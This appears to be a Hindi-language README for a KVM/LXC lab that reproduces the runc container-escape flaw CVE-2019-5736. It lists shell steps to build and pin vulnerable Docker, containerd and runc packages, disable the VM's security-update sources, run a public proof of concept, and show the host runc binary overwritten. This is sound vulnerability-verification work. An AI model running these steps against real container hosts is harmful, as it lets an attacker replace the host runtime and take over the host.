
CVE-2019-5736 के लिए रिप्रोड्यूसर, जो RunC कंटेनर एस्केप भेद्यता है। कमजोर Docker पैकेजों के खिलाफ एक्सप्लॉइट की पुष्टि करने के लिए बिल्ड स्क्रिप्ट और KVM-आधारित लैब प्रदान करता है।
यह आपको अपने KVM इंस्टेंस पर RunC-CVE-2019-5736 के काम करने की पुष्टि करने देता है।
docker.io से संबंधित पैकेज बनाएं*.deb पैकेज इंस्टॉल करें*.deb पैकेज बनाएं$ docker-compose build --no-cache
$ docker-compose run build
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736.git
$ tar cjf RunC-CVE-2019-5736.tar.bz2 RunC-CVE-2019-5736
$ lxc launch --vm images:ubuntu/18.04 test-cve-2019-5736 -c limits.cpu=4 -c limits.memory=4GB
$ lxc file push deb/*.deb RunC-CVE-2019-5736.tar.bz2 test-cve-2019-5736/root/
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# sed -i -e '/bionic-updates/s/^/#/' -e '/bionic-security/s/^/#/' /etc/apt/sources.list
root@test-cve-2019-5736:~# apt update
root@test-cve-2019-5736:~# apt install iptables libltdl7
root@test-cve-2019-5736:~# dpkg -i containerd_0.2.5-0ubuntu2_amd64.deb docker.io_17.12.1-0ubuntu6_amd64.deb runc_1.0.0~rc6+git20181203.96ec2177-0~ubuntu2_amd64.deb
ध्यान दें कि आपको ubuntu:18.04 के बजाय images:ubuntu/18.04 का उपयोग करना चाहिए, क्योंकि lxc exec कमांड बाद वाले के साथ ठीक से काम नहीं करता है।
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# tar xf RunC-CVE-2019-5736.tar.bz2
root@test-cve-2019-5736:~# cd RunC-CVE-2019-5736
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker build -t cve-2019-5736:exec_POC ./exec_POC
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
92b965383f377419f3dad7cec45e468a4c4a83e82e11a2f2e0e23803016e2840
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker exec poc_ctr bash
No help topic for '/usr/bin/bash'
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# /usr/bin/docker-runc
**THE ALL NEW AND IMPROVED RUNC**
[+] Your backdoor here ->
root@test-cve-2019-5736:~/RunC-CVE-2019-5736#